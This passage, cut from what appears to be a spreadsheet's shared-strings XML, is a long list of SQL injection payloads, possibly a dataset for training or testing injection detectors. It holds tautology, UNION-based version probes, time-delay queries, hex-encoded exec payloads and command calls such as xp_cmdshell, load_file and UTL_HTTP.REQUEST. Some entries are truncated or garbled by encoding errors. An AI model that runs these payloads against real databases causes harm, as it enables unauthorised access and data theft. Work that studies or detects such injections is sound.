    <t xml:space="preserve"> select * from users where id = 1 +1&lt;@ union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 +$+. union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"@ union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select \.,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 +$+ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1.%@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#" (  union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> ( </t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select 1 $,version (  )  -- 1</t>
  </si>
  <si>
    <t>x' or 1 = 1 or 'x' = 'y</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 &lt;@$ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "@?" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select \.#,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' + $+%$ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "?%" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or " ) $" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "$@" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or " )  ( " = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "_;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "]." or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or $&lt;\. union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 -@&lt;@ union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>0x770061006900740066006F0072002000640065006C00 ...</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 + \+%\ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ", ) " = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "1[" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "{ ) " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#" (  union select 'a',version (  )  -- 1</t>
  </si>
  <si>
    <t>Ã¢Â€Â˜ or 1 = 1 --</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 % ( $ )  or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>hi' or 1 = 1 --</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select 1 1a,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ".;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1. union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select +\#,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>declare @s varchar  ( 8000 )  select @s  =  0x73656c ...</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1&lt;@&lt;@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve">' or  ( EXISTS ) </t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or  1&lt;@ = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>declare @q nvarchar  ( 200 )  0x730065006c00650063 ...</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "{#" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "{?" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' + $+*$ union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> union all select @@version--</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' + @&lt;@# union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "1," or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select name from syscolumns where id  =   ( sele ...</t>
  </si>
  <si>
    <t>"hi"" )  or  ( ""a"" = ""a"</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or " ( &amp;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 +$ 1 union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' &lt;@$_ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 +  ( $+ )  or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select @ _,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or \+&lt;\ union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "._" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select @&lt;@.,version (  )  -- 1</t>
  </si>
  <si>
    <t>a'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1.  union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or $&lt;\ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 + ( 1 )  union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or  ( \ )  = 1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION SELECT</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "%," or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or $&lt;\ union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "@%" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or $+&lt;$ union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 &lt;@$_ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or \.&lt;1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or " ) [" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1. union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>hi or a = a</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 +  ( \+ )  union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>os</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or  ( $+ )  = 1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or \&lt;$ union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 + @&lt;@. union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>v</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 +\. union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1.&lt;@. union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or " ) {" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select @ @1,version (  )  --  1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or " ) @" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 &lt;@. union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"? union select 'a',version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#", union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "{," = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "{1" = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>' or 0 = 0 --</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 &lt;@1$ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or " ) ;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select $ _,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 + \+*$ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> or 'text'  =  n'text'</t>
  </si>
  <si>
    <t xml:space="preserve"> or  ( EXISTS ) </t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1. &lt;@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1.&lt;1# union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1.*1 union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 11||1 union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1'   union select null,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' + @ @1 union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>x' AND email IS NULL; --</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1.  union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 + $+%1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>' or 1 = 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or \.&lt;  = 1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "_ ) " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve">exec ( @s ) </t>
  </si>
  <si>
    <t xml:space="preserve"> and 1 =  (  if  (  (  load_file ( char ( 110,46,101,120,11 ...</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or !&lt;1 union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select 1a,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "?@" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or \&lt;\ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' *$ 1 or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"$ union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 &lt;@&lt;@ union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or \&lt;\. or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or !&lt;@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1'&lt;@.. or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> or 1 = 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ";#" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "$ ( " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#", union select 'a',version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select @ 1,version (  )  --  1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1'   or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve">declare @s varchar  ( 200 )  select @s  =  0x73656c65637420404076657273696f6e exec ( @s ) </t>
  </si>
  <si>
    <t xml:space="preserve"> or 'whatever' in  ( 'whatever' ) </t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 * ( 1 )  union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or $&lt;\. or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> or 1 = 1 or "" = </t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ";]" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1&amp;@# = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ".." = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1.%@ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> or 1/*</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#", = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> or sleep ( __TIME__ ) #</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' + @ ( 1 )  union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select $["],@@VERSION -- 1'</t>
  </si>
  <si>
    <t>UEf</t>
  </si>
  <si>
    <t>1 waitfor delay '0:0:10'--</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "?;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 +1 union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or $+&lt;$ union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>a' or 3 = 3--</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 * ( \ )  union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select  ( 1 ) ,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or \&lt;\ union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>anything' OR 'x' = 'x</t>
  </si>
  <si>
    <t xml:space="preserve">; exec  ( 'sel' + 'ect us' + 'er' ) </t>
  </si>
  <si>
    <t xml:space="preserve"> or 2 &gt; 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 &lt;@&lt;@ union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select +!&lt;@,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select  @ $,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#". union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ";_" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> or sleep ( __TIME__ )  = '</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "; ( " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 + $+%\ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' + 1||1 union select 1,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> 'sleep 50'</t>
  </si>
  <si>
    <t xml:space="preserve"> )  or sleep ( __TIME__ )  = '</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or \.&lt;$ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "@ ) " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or $&lt;\. union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1.*1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 | |1 union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or \&lt;1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "1#" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or " ( [" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ".[" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 +  ( \+ )  or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 -@&lt;@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select @&lt;@,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or \.&lt;  = 1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ";[" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>hi' or 'x' = 'x';</t>
  </si>
  <si>
    <t>x' AND userid IS NULL; --</t>
  </si>
  <si>
    <t>declare @s varchar ( 200 )  select @s  =  0x77616974 ...</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' + $ . union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "&amp; ) " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>_x0018_ or 1 = 1 --</t>
  </si>
  <si>
    <t xml:space="preserve"> )  or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or " ) ]" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "$#" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 -1&lt;@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>â€˜ or 3 = 3 --</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"? union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or " ) ," or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 +\+. union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select @||1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ";," = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 %$ 1 union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or " (  ) " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 &lt;@. or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> -- &amp;password = </t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' &lt;@$_ union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"; or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> )  or  ( a = a</t>
  </si>
  <si>
    <t>a' or 1 = 1--</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"{ union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "$_" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' &lt;@&lt;@ union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select @&lt;@$,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 &lt;@&lt;@ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' &lt;@&amp;1 union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or \.&lt;1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 11&lt;1# union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> or '1' = '1</t>
  </si>
  <si>
    <t>or a = a</t>
  </si>
  <si>
    <t xml:space="preserve"> or x = x</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "$?" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "1]" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select 1"!",banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or  ( \. )  = 1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or  @$# = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select @ 1a,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select @ 1$,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 + ( 1 )  or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>; exec master..xp_cmdshell</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#". union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 + \+*\ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select 1&lt;@,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve">declare @s varchar ( 22 )  select @s  = </t>
  </si>
  <si>
    <t xml:space="preserve"> or 'a' = 'a</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 % ( @ )  or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 *\. union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>â€˜ or 1 = 1 --</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or @#"; = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 *1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 + \+%1 union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> group by userid having 1 = 1--</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or @&lt;@ = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ". ) " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve">0x77616974666F722064656C61792027303A303A31302700 exec ( @s ) </t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1   union select null,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>?s</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select $ .,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#", union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>ÃƒÂ½ or 1 = 1 --</t>
  </si>
  <si>
    <t>'  ( select top 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or \&lt;\. or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from information_schema.tables--</t>
  </si>
  <si>
    <t>||UTL_HTTP.REQUEST</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select "?"_,version (  )  -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or 1^ = 1 union select 1,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1. union select null,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>hi or 1 = 1 --"</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' + $+%\ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>UEs</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 + $+%$ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>sqlvuln;</t>
  </si>
  <si>
    <t>&amp;apos; OR</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "??" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or \&lt;  = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 &amp;@ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>0 or 1 = 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select \,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 +  ( \. )  or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "%_" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "{ ( " = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or \&lt;\. union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select !&lt;1,version (  )  -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> ) s</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' &lt;@&amp;1 or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or " ) 1" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"? union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 + $+%1 union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ",," = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 +1 union select null,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>Ã¢Â€Â˜ or 3 = 3 --</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ";@" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or @#", = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1. or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"{ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select \#,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select !&lt;1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or " ( @" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select +!&lt;1,version (  )  -- 1</t>
  </si>
  <si>
    <t>n</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "{@" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> or '7659' = '7659</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"? union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 +$ . union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' &lt;@.$ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or $ . = 1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 &lt;@.$ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1'&lt;@.. union select 1,version (  )  -- 1'</t>
  </si>
  <si>
